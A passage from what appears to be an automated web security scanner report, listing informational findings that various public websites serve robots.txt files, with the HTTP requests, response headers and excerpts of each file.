Host:   http://www.sportsauthority.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsauthority.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 11 May 2010 08:45:05 GMT
ETag: "4dc7e9-1be-4864d8abba640"
Accept-Ranges: bytes
Content-Length: 446
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:07:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /coreg/
Disallow: /cart/
Disallow: /checkout/
Disallow: /cartHandler/
Disallow: /ControllerServlet/
Disallow: /emailHandler/
Disallow: /graphics/
Disallow: /include/
D
...[SNIP]...

24.775. http://www.sportsmansguide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportsmansguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsmansguide.com

Response

HTTP/1.1 200 OK
Content-Length: 166
Content-Type: text/plain
Last-Modified: Thu, 07 Oct 2010 19:15:47 GMT
Accept-Ranges: bytes
ETag: "7e434fc5466cb1:d75"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:32 GMT
Connection: close

# Do not spider the admin directory
User-agent: *
Disallow: /admin/
Disallow: /net/catalog/

# Stress Tool is not allowed
User-agent: Stress-agent
Disallow: /

24.776. http://www.sportsnetwork.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportsnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sportsnetwork.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:44:06 GMT
Date: Sat, 02 Apr 2011 13:43:06 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 11 Mar 2011 20:17:01 GMT
ETag: "db68344829e0cb1:15ed"
Content-Length: 58

# robots.txt
User-agent: *
Disallow:
Crawl-delay: 60

24.777. http://www.springerlink.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.springerlink.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.springerlink.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 605
Accept-Ranges: bytes
Cache-Control: public, max-age=1209600
Expires: Sat, 16 Apr 2011 13:45:03 GMT
Last-Modified: Tue, 15 Mar 2011 16:27:15 GMT
ETag: Tue, 15 Mar 2011 11:27:15 GMT
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:45:03 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: Googlebot
Allow: /architecture-and-design/$
Allow: /behavioral-science/$
Allow: /biomedical-and-life-sciences/$
Allow: /business-and-eco
...[SNIP]...

24.778. http://www.sprint.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sprint.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:27:07 GMT
Content-length: 127
Content-type: text/plain
Last-modified: Tue, 29 Jun 2010 17:26:58 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /localbusiness/
# Prevent duplicate localbusiness content from being indexed
Disallow: /index_c.html

24.779. http://www.squidoo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.squidoo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.squidoo.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 11 Jun 2010 22:15:55 GMT
ETag: "5ca0b6d-1e7-488c87b945cc0"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 487
Date: Sat, 02 Apr 2011 12:44:00 GMT
X-Varnish: 1710142489 1709711074
Age: 6157
Via: 1.1 varnish
Connection: close

#
# Squidoo Robots exclusion file
# See http://www.robotstxt.org/wc/faq.html for more information
#

User-agent: Mediapartners-Google
Disallow:

User-Agent: Lijit Crawler
Disallow:

User-agent: *
Dis
...[SNIP]...

24.780. http://www.ssa.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ssa.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ssa.gov

Response

HTTP/1.1 200 OK
Server: Generic Web Server 1.0
Date: Sat, 02 Apr 2011 13:34:30 GMT
Cache-control: public
Content-type: text/plain
Last-modified: Tue, 18 Aug 2009 14:19:27 GMT
Content-length: 775
Etag: "307-4a8ab86f"
Accept-ranges: bytes
Connection: close

# www.ssa.gov robots.txt
# 09/03/08
# Larry Montgomery
User-Agent: *
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /temp/
Disallow: /aian/
Disallow: /archives/
Disallow: /caosa/
Disallow:
...[SNIP]...

24.781. http://www.stanford.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stanford.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stanford.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:05 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 23:32:15 GMT
ETag: "16ea0b-4f-49ea1f473ddc0"
Accept-Ranges: bytes
Content-Length: 79
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /~folutade/ATI/
Disallow: /dept/soc/people/rsandefur/


24.782. http://www.star-telegram.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.star-telegram.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.star-telegram.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Fri, 21 Jan 2011 16:41:32 GMT
ETag: "f754a6-ab9-4d39b73c"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:05:56 GMT
Content-Length: 2745
Connection: close

# robots updated: 2008/06/04 - pbuckley@mi
# robots updated: 2008/05/23 - chilton
# robots updated: 2008/11/18 - kvetter

# Made changes to old RTF - created 2008/10/02: User-agent: * Disallow: /
...[SNIP]...

24.783. http://www.starpulse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starpulse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.starpulse.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:06 GMT
Server: Apache/2.2.15 (FreeBSD) PHP/5.3.2
Last-Modified: Thu, 10 Mar 2011 15:40:35 GMT
ETag: "9a36a9-d4-49e22aa97e2c0"
Accept-Ranges: bytes
Content-Length: 212
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Slurp
Crawl-delay: 5
Disallow: /forum/
Disallow: /members/
Disallow: /sp_comments/

User-agent: *
Disallow: /forum/
Disallow: /members/profile.html
Disallow: /sp_comments/
Disallow: /objec
...[SNIP]...

24.784. http://www.startribune.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.startribune.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.startribune.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 01 Apr 2011 13:50:50 GMT
X-Server-Name: dv-c1-r1-u7-b7
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:37:30 GMT
Content-Length: 55
Connection: close

User-agent: *
Disallow:/search
Disallow:/searchresults

24.785. http://www.state.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state.gov

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "ed2c2598845076d83690ba59b058e231:1301741921"
Last-Modified: Sat, 02 Apr 2011 10:58:41 GMT
Accept-Ranges: bytes
Content-Length: 159
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:38:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:38:07 GMT
Connection: close

# tell scanning search robots not to index the older archive pages
#
User-agent: *
Disallow: /www/
Disallow: /waterfall/
Disallow: /menu/
Disallow: /navitest/

24.786. http://www.state.tn.us/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.tn.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.state.tn.us

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:51 GMT
Server: Apache
Last-Modified: Tue, 27 Jan 1998 21:48:00 GMT
ETag: "c51f7-16-70b5a400"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/plain

User-Agent:
Disallow:

24.787. http://www.statefarm.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.statefarm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.statefarm.com

Response

HTTP/1.1 200 OK
Content-Length: 347
Content-Type: text/plain
Last-Modified: Tue, 22 Mar 2011 20:52:54 GMT
Accept-Ranges: bytes
ETag: "0d7721dd3e8cb1:93e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:50:08 GMT
Connection: close

User-Agent: *

Crawl-delay: 5

# Disallow
Disallow: /errors/
Disallow: /apps/email/ContactAgent/ContactAgent.asp

# Sitemaps
Sitemap: http://www.statefarm.com/sitemap.xml
Sitemap: http://www
...[SNIP]...

24.788. http://www.stateuniversity.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stateuniversity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stateuniversity.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 14:13:46 GMT
Content-Type: text/plain
Content-Length: 60
Last-Modified: Tue, 29 Mar 2011 15:30:02 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /resources
Disallow: /comparison/add

24.789. http://www.steadyhealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.steadyhealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.steadyhealth.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:29 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 14:13:12 GMT
ETag: "2bda472-20f-48d649de32e00"
Accept-Ranges: bytes
Content-Length: 527
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 13:33:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /faq.php
Disallow: /login.php
Disallow: /posting.php
Disallow: /profile.php
Disallow: /search.php
Disallow: /vote.php
Disallow: /software/vitamin_test/*
Disallow: /wishlist/*
D
...[SNIP]...

24.790. http://www.stltoday.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stltoday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stltoday.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2013520
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 02 Apr 2011 13:28:50 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.7
X-TNCMS-Render-Time: 0.0241
X-PHP-Engine: enabled
Real-Hostname: stltoday.com
X-TNCMS-Served-By: cmsapp3
Content-Length: 118
Connection: close
X-Cache-Info: cached

User-agent: *
Disallow: /json
Disallow: /test
Disallow: /template

Sitemap: http://www.stltoday.com/sitemap.xml

24.791. http://www.stlyrics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stlyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stlyrics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:06:34 GMT
Server: Apache/2.0.55
Last-Modified: Sun, 13 Sep 2009 05:00:00 GMT
ETag: "4e3f4-23-6bdbb400"
Accept-Ranges: bytes
Content-Length: 35
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /cgi-bin

24.792. http://www.stumbleupon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 27 Jan 2011 22:52:51 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Sat, 02 Apr 2011 12:38:09 GMT
X-Varnish: 554478042 554410793
Age: 112
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

24.793. http://www.stylelist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stylelist.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:40 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 187
Keep-Alive: timeout=5, max=999982
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /forward
Disallow: /traffic
Disallow: /mm_track
Disallow: /tag/expire-images*
Disallow: /_uac/adpage.html
Sitemap: http://www.stylelist.com/sitemap_index.xml

24.794. http://www.suite101.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suite101.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.suite101.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:44 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 JRun/4.0
Set-Cookie: CFID=446052314;expires=Mon, 25-Mar-2041 12:43:44 GMT;path=/
Set-Cookie: CFTOKEN=74376314;expires=Mon, 25-Mar-2041 12:43:44 GMT;path=/
Set-Cookie: SUITE101_TRACKING=DE67A0D4%2D06DC%2DE3A2%2D904E049416791826;domain=.suite101.com;expires=Mon, 25-Mar-2041 12:43:44 GMT;path=/
Pragma: no-cache
cache-control: no-cache
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-455a6255=455a625a:0; expires=Sat, 02-Apr-11 13:01:40 GMT; path=/

User-agent: *

Disallow: /admin/
Disallow: /cfide/
Disallow: /section/content_admin/
Disallow: /course/admin/
Disallow: /course/developer/
Disallow: /suiteu/admin/
Disallow: /functions/
Disallow: /tr
...[SNIP]...

24.795. http://www.suntimes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suntimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.suntimes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 06 Dec 2010 15:36:08 GMT
ETag: "94ba-2a-496bfa5988a00"
Accept-Ranges: bytes
Content-Length: 42
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:37:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: SUNT=SUNT_ECP11; path=/
Cache-control: private

User-agent: *
Disallow: /csp/
Allow: /

24.796. http://www.superiorpics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superiorpics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superiorpics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:40 GMT
Server: Apache/1.3.41 (Unix)
Last-Modified: Fri, 10 Jul 2009 08:04:07 GMT
ETag: "1deb0a6-2e-4a56f5f7"
Accept-Ranges: bytes
Content-Length: 46
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /newdesign/
Allow: /


24.797. http://www.superpages.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superpages.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:29 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 02 Sep 2010 18:29:44 GMT
ETag: "5939-169-48f4aff837600"
Accept-Ranges: bytes
Content-Length: 361
Connection: close
Content-Type: text/plain
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 13:39:29 GMT;path=/;httponly

User-agent: *
Disallow: /about/contact.html
Disallow: /about/feedback.html
Disallow: /adcode/
Disallow: /RealMedia/ads/
Disallow: /about/search_within_map_feedback.html
Disallow: /products/mail.html
D
...[SNIP]...

24.798. http://www.symantec.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.symantec.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Fri, 01 Apr 2011 22:06:47 GMT
ETag: "1167-4d964c77"
Content-Type: text/plain
Cache-Control: public, max-age=720
Date: Sat, 02 Apr 2011 13:26:54 GMT
Content-Length: 4455
Connection: close

# Standard List
User-agent: *
Disallow: /common/
Disallow: /content/
Disallow: /corp/
Disallow: /css/
Disallow: /ssi/
Disallow: /lib/
Disallow: /errors/
Disallow: /feedback/
Disallow: /media
...[SNIP]...

24.799. http://www.t-mobile.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.t-mobile.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 20:53:23 GMT
Accept-Ranges: bytes
ETag: "ae74d1ace5efcb1:0"
Server: Microsoft-IIS/7.0
Date: Sat, 02 Apr 2011 13:31:15 GMT
Connection: close
Content-Length: 34

User-agent: *
Disallow: /



24.800. http://www.tagged.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tagged.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:08 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 17:13:08 GMT
ETag: "6972a8-1214-49b4fc34a7100"
Accept-Ranges: bytes
Content-Length: 4628
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

#########################################################################
# /robots.txt file for http://www.tagged.com/
# mail webmaster@tagged.com for constructive criticism
#########################
...[SNIP]...

24.801. http://www.talkingpointsmemo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talkingpointsmemo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.talkingpointsmemo.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:51:51 GMT
Keep-Alive: timeout=10, max=999
Accept-Ranges: bytes
ETag: "7a4e2d-54-3db2d713d8380"
Connection: close
Last-Modified: Mon, 24 May 2004 15:39:10 GMT
Content-Length: 84

User-agent: *
Disallow: /blogads/
Disallow: /mt/
Disallow: /old/
Disallow: /zander/

24.802. http://www.tampabay.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tampabay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tampabay.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 13:39:21 GMT
Content-Type: text/plain
Connection: close
Cache-control: public,private
Last-modified: Thu, 17 Mar 2011 20:37:18 GMT
Etag: "189-4d8270fe"
Content-Length: 393
X-Varnish: 380322949 380310991
Age: 187
Via: 1.1 varnish
X-Served-By: varnish-a
X-Cache: HIT
X-Cache-Hits: 1
X-Cache-Backend: default

User-agent: *
Disallow: /cgi-bin/
Disallow: /site/comment/
Disallow: /site/comments/
Disallow: /site/images/

Sitemap: http://www.tampabay.com/sitemap.xml
Sitemap: http://www.tampabay.com/news_sitemap
...[SNIP]...

24.803. http://www.target.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.target.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.target.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:21 GMT
Server: Server
Last-Modified: Fri, 14 Jan 2011 22:27:33 GMT
ETag: "459-f0bf5f40"
Accept-Ranges: bytes
Content-Length: 1113
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/plain
Connection: close

# /robots.txt
Sitemap: http://www.target.com/sitemap_index.xml.gz
Sitemap: http://tgtfiles.target.com/sitemaps/sitemap_search_keywords.xml.gz

User-agent: *
Disallow: /gp/your-store/
Disallow: /gp/mya
...[SNIP]...

24.804. http://www.tastebook.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tastebook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tastebook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:10 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 10:51:02 GMT
Accept-Ranges: bytes
Content-Length: 1736
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 14:09:10 GMT
Vary: Accept-Encoding
P3P: policyref="http://www.tastebook.com/w3c/p3p.xml", CP="ALL DSP COR LAW CURa CONi OUR BUS IND PHY ONL UNI PUR COM NAV STA"
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-Agent: *
Disallow: /tastebooks/preview/
Disallow: /tastebooks/update/
Disallow: /account
Disall
...[SNIP]...

24.805. http://www.techbargains.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techbargains.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techbargains.com

Response

HTTP/1.1 200 OK
P3p: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Set-Cookie: JSESSIONID=845A51D48598ED45B270E5085B15C868; Path=/
Set-Cookie: TEMPTBVERSIONCOOKIE=IkNVUlJFTlRWRVJTSU9OPTIiLCJDVVJSRU5UREFURT0wNC8wMi8yMDExIDA3OjAyOjUyIFBEVCIsIkNVUlJFTlRNRVRIT0Q9UEFSVE9GVEVTVCIsIklOSVRJQUxWRVJTSU9OPTIiLCJJTklUSUFMTUVUSE9EPVBBUlRPRlRFU1QiLCJJTklUSUFMREFURT0wNC8wMi8yMDExIDA3OjAyOjUyIFBEVCIsIlJVTEVJRD1KIiwiVEFSR0VUSUQ9MjEiLCJTRVNTSU9OSUQ9NmMyMTQzZjQtMmZhNS00NDFhLWE1OWYtZDZkMjFmZDJhMzUwIg==; Domain=techbargains.com; Expires=Sat, 02-Apr-2011 14:32:52 GMT; Path=/
Set-Cookie: TBUSERCOOKIE=IlVTRVJJRD05MWIzNmJjYi03ZmRlLTQwYjgtYTk4My0zNTY0YjdmMWNiNGYiLCJSRUZFUlJBTFVSTD0iLCJMQU5ESU5HUEFHRT0vcm9ib3RzLnR4dCIsIkRBVEVDUkVBVEVEPTA0LzAyLzIwMTEgMDc6MDI6NTIgUERUIiwiVkVSU0lPTj0xLjAi; Domain=techbargains.com; Expires=Thu, 20-Apr-2079 17:16:59 GMT; Path=/
Set-Cookie: TBSESSIONCOOKIE=IlNFU1NJT05JRD02YzIxNDNmNC0yZmE1LTQ0MWEtYTU5Zi1kNmQyMWZkMmEzNTAiLCJEQVRFQ1JFQVRFRD0wNC8wMi8yMDExIDA3OjAyOjUyIFBEVCI=; Domain=techbargains.com; Expires=Sat, 02-Apr-2011 14:32:52 GMT; Path=/
Set-Cookie: TBCOUPONCOOKIE=IkNPVVBPTklEUz0i; Domain=techbargains.com; Expires=Thu, 20-Apr-2079 17:16:59 GMT; Path=/
Set-Cookie: TBVERSIONCOOKIE=IkNVUlJFTlRWRVJTSU9OPTEiLCJDVVJSRU5UTUVUSE9EPUFTU0lHTkVEIiwiQ1VSUkVOVERBVEU9MDQvMDIvMjAxMSAwNzowMjo1MiBQRFQiLCJJTklUSUFMVkVSU0lPTj0xIiwiSU5JVElBTE1FVEhPRD1BU1NJR05FRCIsIklOSVRJQUxEQVRFPTA0LzAyLzIwMTEgMDc6MDI6NTIgUERUIg==; Domain=techbargains.com; Expires=Thu, 20-Apr-2079 17:16:59 GMT; Path=/
Set-Cookie: TBSVALCOOKIE=InVzZXJUeXBlPW5ldyIsImN1cnJlbnRVcmw9L3JvYm90cy50eHQi; Domain=techbargains.com; Expires=Sat, 02-Apr-2011 14:32:52 GMT; Path=/
Cache-Control: no-store
Content-Length: 2035
Date: Sat, 02 Apr 2011 14:02:52 GMT
Connection: close
Last-Modified: Mon, 21 Mar 2011 11:39:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1

User-agent: *
Disallow: /i/
Disallow: /ipb/
Disallow: /j/
Disallow: /landing/
Disallow: /test/
Disallow: /alertfind.cfm
Disallow: /cjump.cfm
Disallow: /dealsearch.cfm
Disallow: /doubleredir.c
...[SNIP]...

24.806. http://www.telegraph.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.telegraph.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.telegraph.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 29 Mar 2011 14:01:19 GMT
ETag: "66c855-1ae-49f9f7e92ab3b"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:34:59 GMT
Content-Length: 430
Connection: close

# Robots.txt file
# All robots will spider the domain

User-agent: *

Disallow: */ixale/
Disallow: /core/Content/
Disallow: /*?source=rss
Disallow: /*?source=refresh
Disallow: /*?mobile=true
...[SNIP]...

24.807. http://www.terra.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.terra.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:43 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753983.248502; path=/; expires=Fri, 01-Jan-2016 00:02:22 GMT; domain=.terra.com
Last-Modified: Thu, 09 Sep 2010 12:20:27 GMT
ETag: "74313e-2f6-48fd2a7be18c0"
Accept-Ranges: bytes
Content-Length: 758
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
User-agent: *
Disallow: /agenda-en/
Disallow: /actualidad/
Disallow: /arte/
Disallow: /ciencia/
Disallow: /content/
Disallow: /cgi-bin/
Disallow: /internet/
Disallo
...[SNIP]...

24.808. http://www.textsfromlastnight.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.textsfromlastnight.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.textsfromlastnight.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:45:12 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Sat, 02 Jan 2010 17:03:25 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow:

24.809. http://www.theatlantic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theatlantic.com
